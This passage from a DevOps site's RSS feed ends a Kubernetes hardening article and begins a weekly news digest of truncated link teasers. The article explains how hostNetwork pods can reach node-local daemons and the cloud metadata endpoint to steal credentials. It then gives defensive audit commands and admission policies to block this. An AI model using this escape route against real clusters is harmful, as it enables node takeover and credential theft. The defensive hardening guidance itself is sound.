          data-heading-id="h2-step-1-find-out-who-already-has-it"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Before you enforce anything, see what would break. Audit every pod and workload template that sets host namespaces or other escape-prone fields. This command lists running pods using <code>hostNetwork</code>, <code>hostPID</code>, or <code>hostIPC</code>:</p>
<div class="post-terminal not-prose" data-terminal="{&quot;title&quot;:&quot;audit host-namespace pods&quot;,&quot;prompt&quot;:&quot;$&quot;,&quot;steps&quot;:[{&quot;comment&quot;:&quot;find every pod using a host namespace, across all namespaces&quot;},{&quot;cmd&quot;:&quot;kubectl get pods -A -o json | jq -r '.items[] | select(.spec.hostNetwork==true or .spec.hostPID==true or .spec.hostIPC==true) | \&quot;\\(.metadata.namespace)/\\(.metadata.name)\&quot;'&quot;,&quot;output&quot;:&quot;kube-system/cilium-abcde\nkube-system/kube-proxy-fghij\nmonitoring/node-exporter-klmno\napp/legacy-sidecar-pqrst&quot;},{&quot;comment&quot;:&quot;the kube-system entries are expected; app/legacy-sidecar is the one to question&quot;}]}"></div><p>Expect to see your CNI agent, <code>kube-proxy</code>, and node exporters. Those are legitimate and we will handle them in a moment. What you are hunting for is application workloads in team namespaces that picked up <code>hostNetwork</code> because someone copied a Helm values file or wanted to avoid a Service. Those are the accounts that turn a node-local bug into an incident.</p>
<p>Audit the templates too, not just running pods, since a Deployment can sit at zero replicas:</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># Scan workload templates for host namespaces and privileged settings.</span>
kubectl get deploy,daemonset,statefulset -A -o json \
  | jq -r <span class="hljs-string">&#x27;.items[]
      | select(.spec.template.spec.hostNetwork==true
            or .spec.template.spec.hostPID==true
            or any(.spec.template.spec.containers[].securityContext // {}; .privileged==true))
      | &quot;\(.kind)\t\(.metadata.namespace)/\(.metadata.name)&quot;&#x27;</span>
</code></pre><h2 id="h2-step-2-forbid-host-namespaces-for-normal-workloads" class="group relative scroll-mt-24">
        <a href="#h2-step-2-forbid-host-namespaces-for-normal-workloads" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 2: forbid host namespaces for normal workloads
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-step-2-forbid-host-namespaces-for-normal-workloads"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The cleanest control ships with Kubernetes. Pod Security Admission&#39;s <strong>baseline</strong> profile already forbids host namespaces (<code>hostNetwork</code>, <code>hostPID</code>, <code>hostIPC</code>), <code>hostPath</code> volumes, and privileged containers. Enforcing baseline on the namespaces where teams deploy stops this class of escape without writing a single custom rule.</p>
<p>You can apply the same intent three ways depending on what you run. All three reject the demo pod above.</p>
<div class="post-tabs not-prose" data-tabs="{&quot;title&quot;:&quot;Forbid hostNetwork for application workloads&quot;,&quot;tabs&quot;:[{&quot;label&quot;:&quot;Pod Security Admission&quot;,&quot;lang&quot;:&quot;yaml&quot;,&quot;code&quot;:&quot;# Label the namespace; the API server enforces it. No extra components.\napiVersion: v1\nkind: Namespace\nmetadata:\n  name: app\n  labels:\n    pod-security.kubernetes.io/enforce: baseline\n    pod-security.kubernetes.io/enforce-version: latest\n    # 'warn' and 'audit' help you roll it out without breaking deploys first\n    pod-security.kubernetes.io/warn: baseline&quot;},{&quot;label&quot;:&quot;Kyverno&quot;,&quot;lang&quot;:&quot;yaml&quot;,&quot;code&quot;:&quot;apiVersion: kyverno.io/v1\nkind: ClusterPolicy\nmetadata:\n  name: disallow-host-namespaces\nspec:\n  validationFailureAction: Enforce\n  rules:\n    - name: host-namespaces\n      match:\n        any:\n          - resources:\n              kinds: ['Pod']\n      validate:\n        message: 'hostNetwork, hostPID and hostIPC are not allowed'\n        pattern:\n          spec:\n            =(hostNetwork): 'false'\n            =(hostPID): 'false'\n            =(hostIPC): 'false'&quot;},{&quot;label&quot;:&quot;Gatekeeper&quot;,&quot;lang&quot;:&quot;yaml&quot;,&quot;code&quot;:&quot;# Uses the templates from the gatekeeper-library host-namespaces constraint.\napiVersion: constraints.gatekeeper.sh/v1beta1\nkind: K8sPSPHostNamespace\nmetadata:\n  name: psp-host-namespace\nspec:\n  match:\n    kinds:\n      - apiGroups: ['']\n        kinds: ['Pod']\n    excludedNamespaces: ['kube-system']&quot;}]}"></div><p>Roll it out in stages. Set <code>warn</code> and <code>audit</code> first so you can see which workloads would be rejected, fix or exempt them, then flip <code>enforce</code>. Flipping straight to enforce on a busy cluster is how you find out at 2am that a DaemonSet you forgot about needed <code>hostNetwork</code>.</p>
<h2 id="h2-step-3-cut-off-the-metadata-endpoint" class="group relative scroll-mt-24">
        <a href="#h2-step-3-cut-off-the-metadata-endpoint" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 3: cut off the metadata endpoint
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-step-3-cut-off-the-metadata-endpoint"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Even with host namespaces locked down, normal pods can often still reach IMDS at <code>169.254.169.254</code> through the regular CNI path, and that is its own credential-theft route. Close it:</p>
<ul>
<li>On AKS, GKE, and EKS, use the provider guardrails. EKS users should move to IRSA or EKS Pod Identity and block IMDS access from pods. GKE has Workload Identity and metadata concealment. AKS has Workload Identity so pods stop needing the node&#39;s identity at all.</li>
<li>Where the CNI does enforce policy (normal pods), add an explicit egress deny to <code>169.254.169.254/32</code>.</li>
<li>Prefer per-workload cloud identity (Workload Identity / IRSA / Pod Identity) over node-attached roles, so a node compromise is worth less.</li>
</ul>
<p>None of these help a <code>hostNetwork</code> pod, which is exactly why step 2 comes first. Defense in depth means the metadata block catches the ordinary pods and the host-namespace ban catches the dangerous ones.</p>
<h2 id="h2-when-hostnetwork-is-legitimately-needed" class="group relative scroll-mt-24">
        <a href="#h2-when-hostnetwork-is-legitimately-needed" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          When hostNetwork is legitimately needed
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-when-hostnetwork-is-legitimately-needed"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p><code>hostNetwork</code> is not evil. A handful of components need it because they operate on the node&#39;s networking itself:</p>
<ul>
<li>CNI agents (Cilium, Calico) that program the node&#39;s dataplane</li>
<li><code>kube-proxy</code>, which manages node-level service routing</li>
<li>Node exporters and some observability agents that read host-level network stats</li>
<li>A few ingress and load-balancer setups that bind directly to node ports for performance</li>
</ul>
<p>The rule is not &quot;never use <code>hostNetwork</code>.&quot; It is &quot;only system components use it, and they live where application teams cannot deploy.&quot; Keep those workloads in <code>kube-system</code> or a dedicated, locked-down namespace, exempt only that namespace from the policy, and treat any request to add <code>hostNetwork</code> to an application namespace as a security review, not a config tweak. If a team wants <code>hostNetwork</code> to expose a port, they almost always want a <code>Service</code> or a properly scoped <code>hostPort</code> instead.</p>
<h2 id="h2-key-takeaways" class="group relative scroll-mt-24">
        <a href="#h2-key-takeaways" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Key takeaways
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-key-takeaways"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li><code>hostNetwork: true</code> is a reach amplifier. It does not add Linux capabilities, it removes the network namespace boundary, and that boundary is what keeps untrusted pods away from privileged node-local services and the metadata endpoint.</li>
<li>CVE-2026-32193 is one bug in one Azure service, but the pattern is universal. Every node runs local daemons that trust local callers, so any one of them becomes a node takeover once a pod shares the host network.</li>
<li>NetworkPolicy does not apply to <code>hostNetwork</code> pods. Do not rely on egress rules to contain them.</li>
<li>Enforce Pod Security Admission baseline (or an equivalent admission policy) on application namespaces, audit what already uses host namespaces, and block workload access to IMDS with per-workload cloud identity.</li>
<li>Patch your nodes, then fix the door: keep <code>hostNetwork</code> for the few system components that need it and out of every namespace where untrusted or application code runs.</li>
</ul>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[DevOps Weekly Digest - Week 27, 2026]]></title>
      <link>https://devops-daily.com/news/2026-week-27</link>
      <description><![CDATA[⚡ Curated updates from Kubernetes, cloud native tooling, CI/CD, IaC, observability, and security - handpicked for DevOps professionals!]]></description>
      <pubDate>Mon, 29 Jun 2026 00:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/news/2026-week-27</guid>
      <category><![CDATA[DevOps News]]></category>
      <content:encoded><![CDATA[<blockquote>
<p>📌 <strong>Handpicked by DevOps Daily</strong> - Your weekly dose of curated DevOps news and updates!</p>
</blockquote>
<hr>
<h2 id="h2-kubernetes" class="group relative scroll-mt-24">
        <a href="#h2-kubernetes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ⚓ Kubernetes
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-kubernetes"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-etcd-operator-joins-cozystack-with-a-new-v1alpha2-api" class="group relative scroll-mt-24">
        <a href="#h3-etcd-operator-joins-cozystack-with-a-new-v1alpha2-api" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 etcd-operator joins Cozystack with a new v1alpha2 API
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-etcd-operator-joins-cozystack-with-a-new-v1alpha2-api"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The etcd-operator project, which develops an operator for deploying and maintaining etcd clusters on Kubernetes, has been donated to the Cozystack project. Alongside the donation, a from-scratch imple</p>
<p><strong>📅 Jun 29, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/29/etcd-operator-joins-cozystack-with-a-new-v1alpha2-api/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-open-source-maintainership-in-the-age-of-ai" class="group relative scroll-mt-24">
        <a href="#h3-open-source-maintainership-in-the-age-of-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Open source maintainership in the age of AI
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-open-source-maintainership-in-the-age-of-ai"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AI has really changed the game around software development. More people are leveraging AI than ever to contribute patches to projects they use. To me, this is a good thing as more folks will contribut</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/06/26/open-source-maintainership-in-the-age-of-ai/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-security-profiles-operator-v1-stable-apis-security-hardened-and-shaping-upstream-kubernetes" class="group relative scroll-mt-24">
        <a href="#h3-security-profiles-operator-v1-stable-apis-security-hardened-and-shaping-upstream-kubernetes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Security Profiles Operator v1: Stable APIs, Security Hardened, and Shaping Upstream Kubernetes
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-security-profiles-operator-v1-stable-apis-security-hardened-and-shaping-upstream-kubernetes"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Linux provides powerful kernel-level security mechanisms, seccomp, SELinux, and AppArmor, that restrict what containerized workloads can do. Each uses profiles that define permitted behavior, but writ</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/26/security-profiles-operator-v1-stable-apis-security-hardened-and-shaping-upstream-kubernetes/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-introducing-the-cluster-api-plugin-for-headlamp" class="group relative scroll-mt-24">
        <a href="#h3-introducing-the-cluster-api-plugin-for-headlamp" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing the Cluster API plugin for Headlamp
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-introducing-the-cluster-api-plugin-for-headlamp"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Headlamp is an open-source, extensible Kubernetes SIG UI project designed to let you explore, manage, and debug cluster resources directly from a browser. Cluster API (CAPI) is a Kubernetes sub-projec</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/06/25/headlamp-cluster-api-plugin/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-inspect-volcano-workloads-faster-with-headlamp" class="group relative scroll-mt-24">
        <a href="#h3-inspect-volcano-workloads-faster-with-headlamp" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Inspect Volcano workloads faster with Headlamp
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-inspect-volcano-workloads-faster-with-headlamp"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Volcano is a cloud native batch scheduler for Kubernetes, built for high-performance computing, AI/ML, and other batch workloads. Headlamp is an extensible Kubernetes web UI. With its plugin system, H</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/06/25/visual-context-volcano-headlamp-plugin/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-see-your-serverless-introducing-the-headlamp-plugin-for-knative" class="group relative scroll-mt-24">
        <a href="#h3-see-your-serverless-introducing-the-headlamp-plugin-for-knative" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 See your serverless: introducing the Headlamp plugin for Knative
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-see-your-serverless-introducing-the-headlamp-plugin-for-knative"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Headlamp is an open-source, extensible Kubernetes SIG UI project designed to let you explore, manage, and debug cluster resources. Knative brings serverless workloads to Kubernetes, handling traffic r</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/06/25/headlamp-knative-plugin/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-increasing-hardware-costs-get-more-from-your-vm-estate-with-red-hat-openshift-virtualization" class="group relative scroll-mt-24">
        <a href="#h3-increasing-hardware-costs-get-more-from-your-vm-estate-with-red-hat-openshift-virtualization" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Increasing hardware costs? Get more from your VM estate with Red Hat OpenShift Virtualization
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-increasing-hardware-costs-get-more-from-your-vm-estate-with-red-hat-openshift-virtualization"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>For teams running virtualization estates of any size today, three pressures are converging at once. Hardware budgets that looked generous in late 2024 have been blindsided by memory costs, turning rou</p>
<p><strong>📅 Jun 24, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/increasing-hardware-costs-get-more-your-vm-estate-red-hat-openshift-virtualization"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-faster-nodes-smarter-scaling-whats-new-inside-amazon-elastic-kubernetes-service-amazon-eks-auto-mode" class="group relative scroll-mt-24">
        <a href="#h3-faster-nodes-smarter-scaling-whats-new-inside-amazon-elastic-kubernetes-service-amazon-eks-auto-mode" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Faster nodes, smarter scaling: What’s new inside Amazon Elastic Kubernetes Service (Amazon EKS) Auto Mode
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-faster-nodes-smarter-scaling-whats-new-inside-amazon-elastic-kubernetes-service-amazon-eks-auto-mode"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In this post, we walk through the performance and scalability improvements we shipped across the four pillars of EKS Auto Mode: runtime, compute, storage, and networking.</p>
<p><strong>📅 Jun 23, 2026</strong> • <strong>📰 AWS Containers Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/containers/faster-nodes-smarter-scaling-whats-new-inside-amazon-elastic-kubernetes-service-amazon-eks-auto-mode/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-innovation-s-curve-how-technology-matures-disrupts-and-why-your-next-platform-decision-matters-more-than-you-think" class="group relative scroll-mt-24">
        <a href="#h3-the-innovation-s-curve-how-technology-matures-disrupts-and-why-your-next-platform-decision-matters-more-than-you-think" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The innovation S-curve: How technology matures, disrupts, and why your next platform decision matters more than you think
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-innovation-s-curve-how-technology-matures-disrupts-and-why-your-next-platform-decision-matters-more-than-you-think"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Every technology—from the steam engine to the smartphone—follows a predictable arc: slow start, explosive ascent, then a plateau as physics or economics set in. This arc is the innovation S-curve, and</p>
<p><strong>📅 Jun 23, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/innovation-s-curve-how-technology-matures-disrupts-and-why-your-next-platform-decision-matters-more-you-think"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-eks-now-supports-control-plane-egress-through-your-vpc" class="group relative scroll-mt-24">
        <a href="#h3-amazon-eks-now-supports-control-plane-egress-through-your-vpc" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon EKS now supports control plane egress through your VPC
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-amazon-eks-now-supports-control-plane-egress-through-your-vpc"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Today, we’re announcing customer-routed control plane egress, a new capability that you can use to route Kubernetes control plane traffic through your own Amazon Virtual Private Cloud (Amazon VPC). Th</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 AWS Containers Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/containers/amazon-eks-now-supports-control-plane-egress-through-your-vpc/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cloud-native" class="group relative scroll-mt-24">
        <a href="#h2-cloud-native" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ☁️ Cloud Native
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-cloud-native"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-otel-and-mesh-derived-metrics-a-2026-reference" class="group relative scroll-mt-24">
        <a href="#h3-otel-and-mesh-derived-metrics-a-2026-reference" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 OTel and mesh-derived metrics: A 2026 reference
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-otel-and-mesh-derived-metrics-a-2026-reference"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
